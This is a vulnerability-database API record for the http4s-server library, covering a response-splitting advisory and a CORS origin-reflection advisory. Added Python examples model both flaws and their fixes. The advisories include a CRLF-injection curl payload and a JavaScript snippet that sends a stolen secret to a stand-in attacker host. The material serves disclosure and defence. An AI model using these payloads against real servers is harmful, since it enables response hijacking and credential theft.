Look up vulnerable packages by Package URL.

GET /api/packages/501838?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/packages/501838?format=api",
    "purl": "pkg:maven/org.http4s/http4s-server_2.11@0.14.4a",
    "type": "maven",
    "namespace": "org.http4s",
    "name": "http4s-server_2.11",
    "version": "0.14.4a",
    "qualifiers": {},
    "subpath": "",
    "is_vulnerable": true,
    "next_non_vulnerable_version": null,
    "latest_non_vulnerable_version": null,
    "affected_by_vulnerabilities": [
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/42184?format=api",
            "vulnerability_id": "VCID-1p59-n3nc-d7fg",
            "summary": "Response Splitting from unsanitized headers\n### Impact\n\nhttp4s is vulnerable to response-splitting or request-splitting attacks when untrusted user input is used to create any of the following fields:\n\n* Header names (`Header.name`)\n* Header values (`Header.value`)\n* Status reason phrases (`Status.reason`)\n* URI paths (`Uri.Path`)\n* URI authority registered names (`URI.RegName`) (through 0.21)\n\nThe following backends render invalid carriage return, newline, or null characters in an unsafe fashion.\n\n|                | blaze-server | ember-server | blaze-client | ember-client | jetty-client |\n|:---------------|:-------------|:-------------|:-------------|--------------|--------------|\n| header names   | ⚠            | ⚠            | ⚠            | ⚠            |   ⚠            | \n| header values  | ⚠            | ⚠            | ⚠            | ⚠            |              |\n| status reasons | ⚠            | ⚠            |              |              |              |\n| URI paths      |              |              |  ⚠             |  ⚠             |              |\n| URI regnames   |              |              |  ⚠ < 0.22           |  ⚠ < 0.22            |              |\n\nFor example, given the following service:\n\n```scala\nimport cats.effect._\nimport org.http4s._\nimport org.http4s.dsl.io._\nimport org.http4s.server.blaze.BlazeServerBuilder\nimport scala.concurrent.ExecutionContext.global\n\nobject ResponseSplit extends IOApp {\n  override def run(args: List[String]): IO[ExitCode] =\n    BlazeServerBuilder[IO](global)\n      .bindHttp(8080)\n      .withHttpApp(httpApp)\n      .resource\n      .use(_ => IO.never)\n\n  val httpApp: HttpApp[IO] =\n    HttpApp[IO] { req =>\n      req.params.get(\"author\") match {\n        case Some(author) =>\n          Ok(\"The real content\")\n            .map(_.putHeaders(Header(\"Set-Cookie\", s\"author=${author}\")))\n        case None =>\n          BadRequest(\"No author parameter\")\n      }\n    }\n}\n```\n\nA clean `author` parameter returns a clean response:\n\n```sh\ncurl -i 'http://localhost:8080/?author=Ross'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=Ross\nDate: Mon, 20 Sep 2021 04:12:10 GMT\nContent-Length: 16\n\nThe real content\n```\n\nA malicious `author` parameter allows a user-agent to hijack the response from our server and return different content:\n\n```sh\ncurl -i 'http://localhost:8080/?author=hax0r%0d%0aContent-Length:+13%0d%0a%0aI+hacked+you'\n```\n\n```http\nHTTP/1.1 200 OK\nContent-Type: text/plain; charset=UTF-8\nSet-Cookie: author=hax0r\nContent-Length: 13\n\nI hacked you\n```\n\n### Patches\n\nVersions 0.21.29, 0.22.5, 0.23.4, and 1.0.0-M27 perform the following:\n\n* If a status reason phrase is invalid, it is dropped. Rendering is optional per spec.\n* If a header name is invalid in a request or response, the header is dropped.  There is no way to generically sanitize a header without potentially shadowing a correct one.\n* If a header value is invalid in a request or response, it is sanitized by replacing null (`\\u0000`), carriage return (`\\r`), and newline (`\\n`) with space (` `) characters per spec.\n* If a URI path or registered name is invalid in a request line, the client raises an `IllegalArgumentException`.\n* If a URI registered name is invalid in a host header, the client raises an `IllegalArgumentException`. \n\n### Workarounds\n\nhttp4s services and client applications should sanitize any user input in the aforementioned fields before returning a request or response to the backend.  The carriage return, newline, and null characters are the most threatening.\n\nNot all backends were affected: jetty-server, tomcat-server, armeria, and netty on the server; async-http-client, okhttp-client, armeria, and netty as clients.\n\n### References\n* https://owasp.org/www-community/attacks/HTTP_Response_Splitting\n* https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41084",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00451",
                            "scoring_system": "epss",
                            "scoring_elements": "0.63985",
                            "published_at": "2026-05-29T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41084"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s/commit/d02007db1da4f8f3df2dbf11f1db9ac7afc3f9d8"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s/security/advisories/GHSA-5vcm-3xc3-w7x3"
                },
                {
                    "reference_url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://httpwg.org/http-core/draft-ietf-httpbis-semantics-latest.html#fields.values"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41084",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41084"
                },
                {
                    "reference_url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://owasp.org/www-community/attacks/HTTP_Response_Splitting"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5vcm-3xc3-w7x3",
                    "reference_id": "GHSA-5vcm-3xc3-w7x3",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-5vcm-3xc3-w7x3"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "CVE-2021-41084",
                "GHSA-5vcm-3xc3-w7x3"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p59-n3nc-d7fg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/42224?format=api",
            "vulnerability_id": "VCID-8w5c-xgr6-fbh6",
            "summary": "Default CORS config allows any origin with credentials\n### Impact\n\n#### Origin reflection attack\n\nThe default CORS configuration is vulnerable to an origin reflection attack.  Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com:\n\n```scala\nval routes: HttpRoutes[F] = HttpRoutes.of {\n  case req if req.pathInfo === \"/secret\" =>\n    Response(Ok).withEntity(password).pure[F]\n}\nval app = CORS(routes.orNotFound)\n```\n\nThe following request is made to our server:\n\n```http\nGET /secret HTTP/1.1\nHost: vulnerable.example.com\nOrigin: https://adversary.example.net\nCookie: sessionId=...\n```\n\nWhen the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting.  Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin:\n\n```http\nHTTP/1.1 200 OK\nAccess-Control-Allow-Origin: https://adversary.example.org\nAccess-Control-Allow-Credentials: true \nContent-Type: text/plain\n\np4ssw0rd\n```\n\nA malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.example.org`:\n\n```javascript\nvar req = new XMLHttpRequest(); \nreq.onload = reqListener; \nreq.open('get','https://vulnerable.example.org/secret',true); \nreq.withCredentials = true;\nreq.send();\n\nfunction reqListener() {\n    location='//bad-people.example.org/log?key='+this.responseText; \n};\n```\n\n#### Null origin attack\n\nThe middleware is also susceptible to a Null Origin Attack.  A user agent may send `Origin: null` when a request is made from a sandboxed iframe.  The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above.\n\n### Patches\n\nThe problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25.  The original `CORS` implementation and `CORSConfig` are deprecated.  In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures:\n\n### Migration\n\nThe `CORS` object exposes a default `CORSPolicy` via `CORS.policy`.  This can be configured with various `with*` methods, like any http4s builder.  Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware:\n\n```scala\nval routes: HttpRoutes[F] = ???\nval cors = CORS.policy\n  .withAllowOriginAll\n  .withAllowCredentials(false)\n  .apply(routes)\n```\n\n### Workarounds\n\nIt is possible to be safe in unpatched versions, but note the following defects exist:\n\n* The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response.\n* Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers.\n* Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches.\n* Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations.\n* Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests.  This should be harmless in practice.\n* Needlessly sends `Access-Control-Max-Age` header on non-preflight requests.  This should be harmless in practice.\n* Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header.  This should be harmless in practice.\n\n#### Explicit origins\n\nIn versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(\n  anyOrigin = false,\n  allowOrigins = Set(\"http://trusted.example.com\")\n)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default\n  .withAnyOrigin(false)\n  .withAllowedOrigins(Set(\"http://trusted.example.com\"))\nval cors = CORS(routes, config)\n```\n\n#### Disable credentials\n\nAlternatively, sharing responses tainted by credentials can be deprecated.\n\n##### 0.21.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORS.DefaultConfig.copy(allowCredentials = false)\nval cors = CORS(routes, config)\n```\n\n##### 0.22.x, 0.23.x, 1.x\n\n```scala\nval routes: HttpRoutes[F] = ???\nval config = CORSConfig.default.withAllowedCredentials(false)\nval cors = CORS(routes, config)\n```\n\n### References\n* The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS)\n* [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [GitHub](http://github.com/http4s/http4s)\n* Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39185",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00169",
                            "scoring_system": "epss",
                            "scoring_elements": "0.37842",
                            "published_at": "2026-05-29T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39185"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s/releases/tag/v0.23.2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s/releases/tag/v0.23.2"
                },
                {
                    "reference_url": "https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39185",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39185"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-52cf-226f-rhr6",
                    "reference_id": "GHSA-52cf-226f-rhr6",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-52cf-226f-rhr6"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/370855?format=api",
                    "purl": "pkg:maven/org.http4s/http4s-server_2.11@0.21.27",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.11@0.21.27"
                }
            ],
            "aliases": [
                "CVE-2021-39185",
                "GHSA-52cf-226f-rhr6"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8w5c-xgr6-fbh6"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.http4s/http4s-server_2.11@0.14.4a"
}
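Consuming a record like the one above in a build gate. This is an added example, not VulnerableCode's own client code: `SAMPLE_RECORD` is a hand-trimmed copy of the `/api/packages/501838` response on this page (field names are the API's), and the CVSS threshold in `gate` is an assumed policy. It pulls the CVE alias, the worst CVSS vector, the EPSS score and the per-vulnerability fixed versions out of the nested `references[].scores[]` and `fixed_packages[]` structures.

```python
"""Triage a VulnerableCode package record (added example, not VulnerableCode client code).

SAMPLE_RECORD is a hand-constructed, trimmed copy of the /api/packages/501838 response:
field names are the API's, the gate threshold below is an assumption.
"""
import json
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE_RECORD = json.loads("""{
 "purl": "pkg:maven/org.http4s/http4s-server_2.11@0.14.4a",
 "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null,
 "affected_by_vulnerabilities": [
  {"vulnerability_id": "VCID-1p59-n3nc-d7fg", "aliases": ["CVE-2021-41084", "GHSA-5vcm-3xc3-w7x3"],
   "references": [
    {"scores": [{"value": "0.00451", "scoring_system": "epss", "scoring_elements": "0.63985"}]},
    {"scores": [{"value": "8.7", "scoring_system": "cvssv3.1",
                 "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},
                {"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": ""}]}],
   "fixed_packages": []},
  {"vulnerability_id": "VCID-8w5c-xgr6-fbh6", "aliases": ["CVE-2021-39185", "GHSA-52cf-226f-rhr6"],
   "references": [
    {"scores": [{"value": "0.00169", "scoring_system": "epss", "scoring_elements": "0.37842"}]},
    {"scores": [{"value": "9.1", "scoring_system": "cvssv3.1",
                 "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}]}],
   "fixed_packages": [{"purl": "pkg:maven/org.http4s/http4s-server_2.11@0.21.27", "is_vulnerable": false}]}
 ]}""")


@dataclass
class Finding:
    vcid: str
    cve: Optional[str]
    cvss: Optional[float]
    vector: Optional[str]
    epss: Optional[float]
    fixed_versions: List[str] = field(default_factory=list)


def purl_version(purl: str) -> str:
    """Version component of a Package URL: after '@', before any '?qualifiers' or '#subpath'."""
    _, _, tail = purl.partition("@")
    return tail.split("?", 1)[0].split("#", 1)[0]


def triage(record: dict) -> List[Finding]:
    """One Finding per affecting vulnerability, worst CVSS first.  The same CVSS score is
    repeated under several references, so keep the maximum rather than the first seen."""
    findings = []
    for vuln in record.get("affected_by_vulnerabilities", []):
        cve = next((a for a in vuln.get("aliases", []) if a.startswith("CVE-")), None)
        cvss = vector = epss = None
        for ref in vuln.get("references", []):
            for score in ref.get("scores", []):
                system = score.get("scoring_system")
                if system == "cvssv3.1":
                    value = float(score["value"])
                    if cvss is None or value > cvss:
                        cvss, vector = value, score.get("scoring_elements")
                elif system == "epss":
                    epss = float(score["value"])
        # only packages the database itself marks clean count as fixes
        fixed = [purl_version(p["purl"]) for p in vuln.get("fixed_packages", [])
                 if not p.get("is_vulnerable", True)]
        findings.append(Finding(vuln["vulnerability_id"], cve, cvss, vector, epss, fixed))
    findings.sort(key=lambda f: (f.cvss or 0.0, f.epss or 0.0), reverse=True)
    return findings


def gate(record: dict, block_at: float = 7.0) -> dict:
    """Assumed CI policy: block on any CVSS >= block_at, otherwise warn.  Fix advice comes per
    vulnerability from fixed_packages, because next/latest_non_vulnerable_version can be null
    even when individual vulnerabilities do have fixed releases (as in SAMPLE_RECORD)."""
    if not record.get("is_vulnerable"):
        return {"decision": "allow", "findings": []}
    findings = triage(record)
    decision = "block" if any(f.cvss is not None and f.cvss >= block_at for f in findings) else "warn"
    clean = record.get("next_non_vulnerable_version") or record.get("latest_non_vulnerable_version")
    return {"decision": decision, "purl": record["purl"], "clean_version": clean,
            "findings": [{"id": f.cve or f.vcid, "cvss": f.cvss, "epss": f.epss,
                          "fixed_in": f.fixed_versions} for f in findings]}


if __name__ == "__main__":
    print(json.dumps(gate(SAMPLE_RECORD), indent=2))
```

Two things in this record are worth noticing when writing such a gate. `next_non_vulnerable_version` and `latest_non_vulnerable_version` are both null although the second vulnerability lists `0.21.27` as a fixed package, so a null there means "no version clean of everything known", not "no fix". And `fixed_packages` for the response-splitting entry is empty even though its advisory text names 0.21.29, 0.22.5, 0.23.4 and 1.0.0-M27; an empty `fixed_in` list should be read as "not recorded, read the advisory" rather than "unfixable". The EPSS entry carries a `published_at` timestamp; check it is recent before letting it influence priority.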
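The response-splitting mechanism from the first advisory (CVE-2021-41084), and the patched behaviour it describes, as an added example that is not http4s code. The renderer, the toy response parser and the `cookie_service` model are mine; the sanitising rules (drop an invalid reason phrase, drop a header whose name is not a token, replace CR, LF and NUL in values with spaces) follow the advisory's Patches section. The injected payload is the decoded form of the page's `?author=hax0r%0d%0a...` request, constructed here with CRLF CRLF and an exact `Content-Length` so the minimal parser accepts it.

```python
"""Response splitting through an unsanitised header value, and the fix the advisory describes.

Added example, not http4s code: the renderer and the minimal client-side parser are models
written to show the mechanism, not the library's implementation.
"""
import re

# RFC 7230 field-name: one or more tchar.  A name that fails this cannot be fixed up without
# the risk of turning it into a different, legitimate header, so the whole header is dropped.
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
# Header values: CR, LF and NUL become a space (what the patched releases do).
VALUE_FIXUPS = str.maketrans({"\r": " ", "\n": " ", "\x00": " "})
BAD_REASON = re.compile(r"[\r\n\x00]")


def serialize(status: int, reason: str, headers: list, body: bytes) -> bytes:
    head = [f"HTTP/1.1 {status} {reason}"] + [f"{name}: {value}" for name, value in headers]
    return ("\r\n".join(head) + "\r\n\r\n").encode("utf-8") + body


def render_unsafe(status, reason, headers, body):
    """Pre-patch behaviour: whatever is in a header value goes on the wire verbatim."""
    return serialize(status, reason, headers, body)


def render_hardened(status, reason, headers, body):
    """Patched behaviour: drop a bad reason phrase (rendering it is optional), drop headers
    whose name is not a token, sanitise CR/LF/NUL in values to spaces."""
    if BAD_REASON.search(reason):
        reason = ""
    kept = [(name, value.translate(VALUE_FIXUPS)) for name, value in headers if TOKEN.match(name)]
    return serialize(status, reason, kept, body)


def parse_first_response(raw: bytes) -> dict:
    """Minimal client-side parse: status line and headers up to the first CRLFCRLF, then
    Content-Length bytes of body.  The first Content-Length wins (a simplification)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("utf-8").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    length = int(headers.get("content-length", "0"))
    return {"status": status_line, "headers": headers, "body": rest[:length]}


FAKE_BODY = "I hacked you"
# Decoded form of the page's ?author=hax0r%0d%0aContent-Length:+...%0d%0a%0aI+hacked+you
# payload, constructed with CRLF CRLF and an exact length so the toy parser accepts it.
SPLIT_AUTHOR = f"hax0r\r\nContent-Length: {len(FAKE_BODY)}\r\n\r\n{FAKE_BODY}"


def cookie_service(author: str, hardened: bool) -> dict:
    """Models the advisory's service: 200 with Set-Cookie: author=<param> from untrusted input,
    rendered either way and then parsed as a user agent would."""
    body = b"The real content"
    headers = [("Content-Type", "text/plain; charset=UTF-8"),
               ("Set-Cookie", f"author={author}"),
               ("Date", "Mon, 20 Sep 2021 04:12:10 GMT"),
               ("Content-Length", str(len(body)))]
    render = render_hardened if hardened else render_unsafe
    return parse_first_response(render(200, "OK", headers, body))


if __name__ == "__main__":
    for hardened in (False, True):
        print("hardened" if hardened else "unsafe", cookie_service(SPLIT_AUTHOR, hardened))
```

With the unsafe renderer the attacker's `Content-Length` terminates the header block early, so the client reads `I hacked you` as the body and never sees the server's own `Date` and `Content-Length` headers. With the hardened renderer the same input lands in a single `Set-Cookie` value with the line breaks flattened to spaces, and the real body is delivered. Note that the advisory's curl payload uses a bare LF (`%0d%0a%0a`) for the blank line; real clients accept that, this toy parser does not, which is one reason to sanitise on the server rather than rely on strict parsing downstream.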
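The CORS behaviour from the second advisory (CVE-2021-39185), modelled so the two attacks and the two workarounds can be exercised side by side. This is an added example, not http4s code: `CorsConfig` and `CorsPolicy` borrow the option names the advisory uses (`anyOrigin`, `allowedOrigins`, `allowCredentials`, `withAllowOriginAll`), but the decision logic is my model of what the text describes, and `browser_exposes` is a simplified Fetch-style check of whether page script would be allowed to read the response. The origins are constructed.

```python
"""CORS origin handling: the deprecated default (reflect any Origin, credentials allowed) next
to an allow-list policy, with a model of the browser's check to show what each one exposes.

Added example, not http4s code.  Option names follow the advisory; the logic is a model.
"""
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class CorsConfig:
    """Knobs of the deprecated middleware, with the defaults the advisory calls vulnerable."""
    any_origin: bool = True
    allowed_origins: FrozenSet[str] = frozenset()
    allow_credentials: bool = True


def legacy_cors(cfg: CorsConfig, origin: Optional[str], status: int = 200) -> dict:
    """Modelled pre-patch behaviour: anyOrigin reflects whatever Origin was sent (including
    'null'), the credentials flag is rendered as true/false, rejected requests get a 403."""
    if origin is None:
        return {"status": status, "headers": {}}
    if cfg.any_origin or origin in cfg.allowed_origins:
        return {"status": status, "headers": {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true" if cfg.allow_credentials else "false"}}
    return {"status": 403, "headers": {}}


@dataclass(frozen=True)
class CorsPolicy:
    """Allow-list policy.  A wildcard origin combined with credentials is refused at
    construction time, because that combination is exactly the origin-reflection problem."""
    allow_origin_all: bool = False
    allowed_origins: FrozenSet[str] = frozenset()
    allow_credentials: bool = False

    def __post_init__(self):
        if self.allow_origin_all and self.allow_credentials:
            raise ValueError("allow_origin_all cannot be combined with allow_credentials")


def policy_cors(policy: CorsPolicy, origin: Optional[str], status: int = 200) -> dict:
    """Hardened behaviour: never trust 'null', never reflect an unlisted origin, and on
    rejection omit the CORS headers instead of changing the status (the browser enforces)."""
    if origin is None or origin == "null":
        return {"status": status, "headers": {}}
    if policy.allow_origin_all:
        return {"status": status, "headers": {"Access-Control-Allow-Origin": "*"}}
    if origin in policy.allowed_origins:
        headers = {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
        if policy.allow_credentials:
            headers["Access-Control-Allow-Credentials"] = "true"
        return {"status": status, "headers": headers}
    return {"status": status, "headers": {}}


def browser_exposes(response: dict, origin: str, with_credentials: bool) -> bool:
    """Fetch-style CORS check a user agent applies before handing the body to page script."""
    acao = response["headers"].get("Access-Control-Allow-Origin")
    if acao is None:
        return False
    if with_credentials:  # '*' is never acceptable for a credentialed request
        return acao == origin and response["headers"].get("Access-Control-Allow-Credentials") == "true"
    return acao in ("*", origin)


# constructed origins, standing in for the advisory's adversary and trusted sites
ADVERSARY, TRUSTED = "https://adversary.example.net", "https://trusted.example.com"


def exfiltration_possible(middleware, config, origin: str) -> bool:
    """Could the advisory's XHR with withCredentials=true read /secret from this origin?"""
    return browser_exposes(middleware(config, origin), origin, with_credentials=True)


if __name__ == "__main__":
    for origin in (ADVERSARY, "null", TRUSTED):
        print(origin, "default:", exfiltration_possible(legacy_cors, CorsConfig(), origin),
              "allow-list:", exfiltration_possible(
                  policy_cors, CorsPolicy(allowed_origins=frozenset({TRUSTED}), allow_credentials=True), origin))
```

Under the default `CorsConfig` both the adversary's origin and `null` get reflected with `Access-Control-Allow-Credentials: true`, so the credentialed XHR from the advisory reads the secret. Either workaround closes it: an explicit allow-list with `any_origin=False` (the legacy model still answers 403 rather than simply omitting headers, which the advisory lists as a defect), or `allow_credentials=False`, which the browser refuses to pair with a credentialed request even though the legacy middleware renders the non-standard `false` value. The policy model additionally treats `null` as never trusted and rejects `allow_origin_all` together with credentials at construction, so the unsafe combination cannot be configured by accident.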